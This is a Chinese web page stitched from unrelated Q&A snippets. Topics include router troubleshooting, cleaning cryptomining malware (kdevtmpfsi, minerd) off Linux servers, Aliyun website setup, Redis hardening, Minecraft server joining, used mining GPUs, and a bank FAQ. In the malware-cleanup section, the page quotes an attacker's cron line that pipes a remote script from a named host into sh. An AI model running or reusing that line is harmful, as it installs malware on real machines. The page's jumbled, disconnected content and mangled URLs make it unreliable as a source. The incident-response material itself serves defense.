学校里有人在挖矿吗，我的为什么连接不上

可能吧。不过也有可能是服务器坏了。

我们需要检查的是外部的上网设备是否出现故障，我们可以通过观察路由器的工作指示灯来判断路由器是否处于正常的工作状态，如果我们发现Los灯一直在闪烁或者处于红色状态，那么很有可能就是路由器的外部缆线出了故障，有可能是因为网线的内部发生了断裂，或者终端的插头松了。

挖矿，一词早在几年前开始出现，就是利用电脑硬件，进行获取电子货币。这类电脑通常也可以称为服务器，有专门的挖矿芯片，一般是通过烧显卡的方式来进行工作，耗电量巨大。

问题定位及解决步骤：

1、free -m 查看内存使用状态 ，发现free基本没了。--> 怀疑是服务有内存泄漏，开始排查

2、使用top命令观察，开启的服务占用内存量并不大，且最终文档在一个值，且服务为java应用，内存并没达到父jvm设置上限。按top监控占用内存排序，加起来也不会超过物理内存总量。查看硬盘使用量，占用20%。基本排除虚拟内存占用过大的原因。--->排除服务内存泄漏因素，怀疑mysql和nginx，开始排查

3、因为top命令看 mysql占用内存也再可控范围，是否存在connection占用过多内存，发现并不会，设置最大连接数为1000，最多也不会超过几M。 nginx占用一直非常小。但每次最先被kill的基本都是nginx进程。所以排查，但发现无非就是openfiles数量啥的调整。发现也一切正常。且之前niginx可以正常使用的。

4、最为费解的就是 通过free -m 查看的时候 基本全是used，cache部分很少，free基本没有。但top上又找不到有哪些进程占用了内存。无解

5、注意到有两个进程虽占用内存不多，但基本耗光了100%的cpu。开始想着占cpu就占了，没占内存，现在是内存不不够导致进程被kill的，就没注意这点。

6、实在搞不定，重启服务器，重启了所有服务，服务暂时可用，回家。在路上的时候发现又崩了。忐忑的睡觉。

7、早上起来继续看，这次留意注意了下那两个占用高cpu的进程，kdevtmpfsi 和 networkservice。本着看看是啥进程的心态，百度了下。真相一目了然，两个挖矿病毒。

突然后知后觉的意识到错误原因：

1、cpu占用率高，正常服务使用cpu频率较高的服务最容易最内存超标。（因为在需要使用cpu时没cpu资源，内存大量占用，服务瞬间崩溃），然后看top发现刚刚已经占用内存的进程已经被kill了，所以没发现内存有高占用的情况。

2、后面的应用继续使用cpu时也会发生类似情况，倒是服务一个一个逐渐被kill。

问题点基本定位好了，解决问题就相对简单很多：

通过百度，google，常见的病毒清除步骤基本都能解决。这两个挖矿病毒很常见，大致记录下要点。可能所有病毒都会有这些基础操作。

① 首先，查看当前系统中的定时任务：crontab -l

我服务器上有四个定时下载任务 通过wget 和 curl 下载病毒文件，把异常的删掉。要不然删了病毒文件还是会下载下来

crontab -r，全部删除命令（或根据需求删除定时任务）

② 查找病毒文件 可以全部模糊搜索 清除， 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 后再使用rm -f filename 。可删除

③ kill 病毒进程，但注意kill了可能马上就重启了。因为有守护进程，需要把病毒进程的守护进程也kill掉

④ 检查是否root用户被攻击，可能系统配置信息被更改。

⑤ 最好能理解病毒脚本，通过看代码看它做了些什么。针对脚本取修复系统。

图例4如何搭建阿里云服务器

其次，为我们的root用户设置一个密码。然后我们远程连接到服务器的终端。点击后会弹出远程连接的密码(一定要记住)。下一步是配置服务器。首先创建一个普通用户，然后为这个用户bd设置密码，然后给这个用户添加权限。接下来需要在本地Xshell下运行，安装一个lrzsz，下载一个配置文件到桌面，拖拽到Xshell界面，输入文件名tarxzf解压。

最后，您需要等到所有配置完成。

阿里云服务器怎么搭建网站？

创建实例：购买完进入管理控制台，到云ESC创建一个新实例，操作系统可以随便选，官网推荐的是CentOS6364版，也可以在镜像市场，直接选一个配置好环境的镜像+应用。我这里选的是WindowsServer8，因为要远程连接服务器，我不是很熟悉这块的操作。

远程连接服务器：这里要根据本地系统和服务器系统选择连接方式，我是windows远程连接windows

本地运行mstsc->远程桌面连接->输入实例的IP->选项中可以把本地资源驱动器勾选上->连接

搭建环境：根据自己和项目需求，搭建服务器运行环境。我是在镜像市场购买的免费环境（windows+mysql+apache+php+一些服务器软件），所以略过这一步。

搭建网站：环境配置好后，将本地编写好网站，放在服务器软件网站目录下（Apache中htdocs）

测试网站：在本地浏览器地址栏输入服务器IP地址，确认实例和网站搭建成功

购买域名：可以在阿里云管理控制台中，点击域名，点击域名注册，写一个你要注册的域名。首先要看是否被注册了，然后根据自己需求购买后缀，可以考虑（com）国际通用域名。

域名解析：域名购买成功后，要对域名进行解析，在管理控制台，点击域名，点击域名解析，根据提示填写解析项内容。

网站备案：域名解析成功后，点击网址，发现还是不能进入网站，这个时候会提示要进行备案。注册阿里云备案系统账号，按要求提示上传材料。首先要阿里云备案审核，一个工作日，会打电话联系你。成功后提交给管局，5-20天之内，会打电话联系你。我这里比较幸运，4天就完成了两次备案工作。管局会给你发个短信，里面有备案号，账号，密码等等，保存这些信息，把备案号放置在网站底部。

完成：备案成功后，点击网址就可以进入自己的网站啦，记得平时要对实例快照备份。

阿里云服务器备案接入方法？

需要在阿里云备案系统重新录入备案信息，域名转接入和新备案是一样的，需要提交相同的资料

1 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP

2 chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3 pkill minerd ,杀掉进程

4 service stop crond 或者 crontab -r 删除所有的执行计划

5 执行top，查看了一会，没有再发现minerd 进程了。

6检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blogjobbolecom/94518/然后就注入了病毒，下面是解决办法和清除工作：

1 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2 打开 ~/ssh/authorized_keys, 删除你不认识的账号

3 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉

1、打开我的世界。

2、点击“服务器”选项卡中的“添加服务器”输入名称和地址IP后。

3、点击“游戏”或“保存”。

4、点击“服务器”选项卡中的“添加服务器”。

5、点击“游戏”后会直接进入服务器。

查看显卡是不是矿卡可以参照以下三点：

1、灰尘

显卡运行时需要散热，散热主要是显卡上的风扇，所以风扇上的灰尘会给我们一些判断。一般来说，自用的显卡、风扇不会一直处于全速运行状态，房间内各种纺织品的棉纱网是分散的，所以风扇上的灰尘往往会和棉絮混合积结。

2、接口

接口是指显卡的输出接口。在购买之前，可以向卖家询问日常使用中连接显示器的接口，因为挖矿的显卡通常不使用显示输出接口。在确定了接口后，通过检查是否有灰尘，可以判断接口是否长期使用。如果有很多灰尘，这将证明接口根本没有使用过，或者最近没有使用过。

3、查看螺丝固定板

使用过独立显卡的朋友应该都知道，显卡是通过螺丝来固定在机箱上的，而大规模挖矿的显卡，大多采用的是塑料扎带固定，而自用卡是不会采用这种方式固定的。

扩展资料：

显卡保养如下：

1、机箱通风良好，这可以保护显卡以及保护机器内所有的硬件防止温度过高造成运行速度下降、死机甚至烧毁。机器房间比较热夏天可以将机箱侧面板拿下来以帮助散热，或加风扇来帮助散热，条件允许的话推荐采用水冷来使得显卡工作效率加高。

2、显卡接口和显示器街头接入正确，虚接容易频繁断续或打火导致将显卡接口烧毁

3、超频对于显卡效果并不是十分明显。反而容易造成发热巨增而造成GPU运行速度变慢甚至烧毁。

4、灰尘清理，无论夏卡还是主板或者其他部件，用的时间长了势必会产生灰尘，需要将机箱拆卸后进行除尘工作，以保证各个部件的正常工作

-比特币挖矿机

你好：

这是正常的

当你IP直接登陆挖矿软件不成功时

会自动选择代理服务器登陆

这个IP18341194是我们的代理服务器IP

谢谢你的支持！

比特币挖矿机就是用于赚取比特币的计算机。这类计算机一般有专业的挖矿芯片，多采用安装大量显卡的方式工作，耗电量较大。计算机下载挖矿软件然后运行特定算法，与远方服务器通讯后可得到相应比特币，是获取比特币的方式之一。

根据中国人民银行等部门发布的通知、公告，虚拟货币不是货币当局发行，不具有法偿性和强制性等货币属性，并不是真正意义上的货币，不具有与货币等同的法律地位，不能且不应作为货币在市场上流通使用，公民投资和交易虚拟货币不受法律保护。

温馨提示：以上解释仅供参考，不作任何建议。相关产品由对应平台或公司发行与管理，我行不承担产品的投资、兑付和风险管理等责任。

应答时间：2021-08-13，最新业务变化请以平安银行官网公布为准。

[平安银行我知道]想要知道更多？快来看“平安银行我知道”吧~

https://bpingancomcn/paim/iknow/indexhtml